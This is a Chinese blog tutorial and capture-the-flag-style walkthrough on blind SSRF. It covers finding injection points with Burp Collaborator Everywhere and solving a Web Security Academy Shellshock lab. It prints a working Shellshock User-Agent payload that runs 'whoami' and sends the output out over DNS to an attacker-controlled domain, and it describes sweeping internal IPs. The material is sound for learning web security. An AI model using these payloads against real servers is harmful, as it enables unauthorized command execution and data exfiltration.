SSRF盲打 & Collaborator everywhere

最新推荐文章于 2023-08-01 23:05:21 发布
最新推荐文章于 2023-08-01 23:05:21 发布
阅读量4.3k 收藏 9
点赞数 4
分类专栏: WEB安全 文章标签: 安全漏洞 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/120624292
版权

目录

什么是盲SSRF漏洞?

如何寻找和利用盲SSRF漏洞?

SSRF盲打

Collaborator everywhere(ssrf扫描器 自动发现ssrf注入点)

SSRF via the Referer header

SSRF盲打配套靶场

ssrf盲打

Shellshock(CVE-2014-6271)

什么是盲SSRF漏洞?

和sql盲注一样,就是不会在响应中得到SSRF攻击的反馈

如何寻找和利用盲SSRF漏洞?

与sql盲注相同,ssrf盲打最佳利用方式就是通过带外技术接收响应结果。也是同样使用burp自带的简易带外平台collaborator。即使有一些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。

有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络中开放的主机及端口之类的,这些同样也可以通过带外通道接收到。

还有一种情况就是所谓的反弹shell了

SSRF盲打

利用盲ssrf漏洞进行的攻击就是SSRF盲打

如果通过ssrf我们不能直接获得响应,那么可以通过带外技术来测试是否后台发送了我们输入的url, Burp Collaborator client会生成一个域名,将可能产生ssrf的点输入该域名,如果后端存在ssrf,那么就会发送请求到Burp Collaborator client,然后Burp Collaborator client也会有记录谁访问了我,通过这种手法来发现潜在的ssrf

简单地识别可以触发带外 HTTP 请求的盲SSRF 漏洞本身并不能提供可利用性的途径。由于您无法查看来自后端请求的响应,因此无法使用该操作来探索服务器上的内容。但是,它仍然可以用来探测服务器本身或其他后端系统上的其他漏洞。您可以盲目扫荡内部 IP 地址空间,发送可以检测已知漏洞的有payload。如果这些payload(比如可以实现反弹shell或者各种带外能力比如nslookup)还使用了带外技术,那么就会发现未打补丁的内部服务器上的严重漏洞。

Collaborator everywhere(ssrf扫描器 自动发现ssrf注入点)

ssrf的注入点不仅可以在get或者post的请求参数中也可以在http请求头字段,Collaborator everywhere给可能发生ssrf的点都写入payload,如果存在ssrf,那么相应的Burp Collaborator client就会检测到,从而Collaborator everywhere就会报告这个漏洞点

Burp Collaborator client可以理解为服务器的一个可视化客户端,该服务器有DNS服务可以查询所有自己域名下子域名的ip并且好像基本都指向了自己,点击copy to clipboard可以获得该服务器的域名,poll now可以查看发送到该服务器的所有请求,如下所示3.251.104.231向我们发送了四次DNS请求

比如这个测试这个页面

这是正常的请求包

这是开启了Collaborator everywhere插件的请求包

注意要将该域名加入scope,scope里的是Collaborator everywhere的作用域

可以发现多了很多http头而且内容也都修改为了攻击者服务器的域名,只要在这些字段存在ssrf,那么就会访问相应的Burp Collaborator client,从而被Collaborator everywhere记录下来

点击forward,在sitemap该域名下就可以看到Collaborator everywhere给我们发送的存在ssrf注入的点,referer和user-agent

点进去可以看到漏洞详细信息,这个是我们发送的请求

如上可以看到网站服务器确实将收到请求的refer和useragent字段拿出来去访问了一下,可能网站是为了做行为分析等,如果配置不当就会导致ssrf

SSRF via the Referer header

Some applications employ server-side analytics software that tracks visitors. This software often logs the Referer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities. See Blind SSRF vulnerabilities for examples of vulnerabilities involving the Referer header.

SSRF盲打配套靶场

Lab: Blind SSRF with Shellshock exploitation | Web Security Academy

网站主页如下

为了发现ssrf,先给他加入到scope中以好使用Collaborator everywhere插件

刷新网站页面,抓包

通过下面可以看出在主页面没有发现ssrf

那就看看网站其他页面

发送包之后可以看到检测到了ssrf注入点,分别在refer和user-agent字段

从它给出的详细信息可以看出来网站服务器在收到请求之后访问了refer字段的域名并且带上了原user-agent字段,这就发现了一个盲ssrf漏洞

ssrf盲打

题目给出了请用shellshock的payload进行ssrf盲打192.168.0.*:8080

Shellshock(CVE-2014-6271)

Bash 4.3以及之前的版本在处理某些特殊构造的环境变量时存在安全漏洞,向函数环境变量值后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统

受到该漏洞影响的bash使用的环境变量是通过函数名称来调用的,以“(){”开头通过环境变量来定义的。而bash在处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令

比如下面先定义了个特殊构造的“函数环境变量”(正确定义函数变量应该是foo='(){函数代码};'),然后执行bash后就会自动执行foo环境变量函数后面那块

 

ShellShock 攻击实验 - ayi111 - 博客园

详解ShellShock 漏洞复现原理,内附ShellShock的修复方法_Anprou的博客-CSDN博客_shellshock复现

先用Burp Collaborator client创建个域名

 

重新抓取存在ssrf的页面然后进行intrude,将shellshock的payload放到user-agent字段

HTTP协议的头User-Agent通常是保存在环境变量HTTP_USER_AGENT

shellshock的payload:() { :; }; /usr/bin/nslookup whoami.YOUR-SUBDOMAIN-HERE.burpcollaborator.net

YOUR-SUBDOMAIN-HERE就是刚才Burp Collaborator client生成的域名,该payload可以将whoami的信息带外出来

开始爆破

看我们的Burp Collaborator client中有没有请求发过来

从上面可以看出来3.251.104.231向我们发送了dns请求,从而whoami信息被外带出来了

浔阳江头夜送客丶
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:fire: 自卫队 :fire: v1.12最新 burp的SSRF插件,可在所有请求中自动进行SSRF检测 如果您遇到任何问题或想要下面未列出的新功能,请在此表格中创建一个新的问题 即将发布的功能清单 :check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载 它将很快能够测试Json和XML 测试SMTP SSRF 如何安装/建造 git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在build / libs下找到文件“ ssrf-king.jar”,然后可以将其导入Burpsuite。 另外,goto可以下载编译的文件。 特征 :check_mark: 测试所有外部交互的请求。 :check_mark: 检查是否有任何交互不是用户IP(如果有的话),它是一个开放的重定向。 :check_mark: 提醒用户任何外部交互,包括以下信息:
探索网络深处的隐秘面:Burp Lens 专业扩展插件
最新发布
gitblog_00033的博客
05-23 412
探索网络深处的隐秘面:Burp Lens 专业扩展插件 项目地址:https://gitcode.com/PortSwigger/collaborator-everywhere 1、项目介绍 在网络安全领域,全面了解目标网站的安全状况至关重要,而Burp Lens正是这样一款强大的Burp Suite Pro扩展工具。它通过注入非侵入性的HTTP头部信息,帮助揭示隐藏在后端系统的"隐形攻...
SSRF盲打 && Collaborator everywhere
qq_22132931的博客
02-05 658
SSRF盲打 && Collaborator everywhere
[翻译]盲SSRF利用链术语表
dzqxwzoe的博客
02-26 558
计算机专业的同学都应该接触了解过,这部分可以直接略过。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
Blind SSRF vulnerabilities:盲SSRF漏洞实例
Zeker62的博客
08-16 1753
What is blind SSRF? Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application’s front-end response. 不能看见返回给客户端的内容 Wh
SQL/SSRF!Burp被动代理扫描插件
潇湘信安的博客
06-22 776
这是一款Burpsuite被动代理扫描插件,可支持检测SQL注入、SSRF漏洞。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF
weixin_44857670的博客
07-03 693
@SSRF #SSRF 个人总结 SSRF 其全称 :Server—Side Request Forgery :服务器端请求伪造 是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。 很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web 应用可以获取图片,下载文件,读取文件等。这个功能如果被恶意使用,可以利用存在缺陷的...
SSRF漏洞学习
Wawyw's Blog
04-01 863
1、SSRF概念 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 2、SSRF的原理 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地址做过滤和限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下
渗透系列之SSRF漏洞
Websec
02-23 3805
渗透系列之SSRF漏洞 By:梭哈王、小米粥 参考文章: https://xz.aliyun.com/t/2115#toc-2 https://_thorns.gitbooks.io/sec/content/ssrf_tips.html https://_thorns.gitbooks.io/sec/content/ssrf_tips.html 一:漏洞概念 SSRF全称为Serve...
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8169
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
ssrf漏洞内网渗透_ssrf 扫盲贴,关于测试的那些事
weixin_39706561的博客
12-21 385
序言第一次接触SSRF,还是在乌云的猪猪侠大佬的分享,现在很多同志还是不太了解,我做一个简单的描述,有不对的地方可以多多交流Ssrf(Server-Side Request Forgery:服务器端请求伪造)csrf(Cross-site request forgery:跨站请求伪造)从这两个讲解上来看差别是不是不大,今天给大家讲这个,我也是考虑了很多,主题是前端漏洞,ssrf并不算是...
SSRF学习记录
web1的博客
09-01 255
什么是SSRF? SSRF全称是Server-Side Request Forgery,它就是攻击者诱使服务器向攻击者指定的域发送HTTP请求,可以用来建立恶意的连接 危害 1、针对服务器本身的SSRF攻击 1.1将stockApi参数中的 URL 更改为 http://localhost/admin 这应该显示管理界面。 <a href="/admin/delete?username=carlos">Delete</a> 1.2阅读 HTML ,确定删除目标用户的 URL,即
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值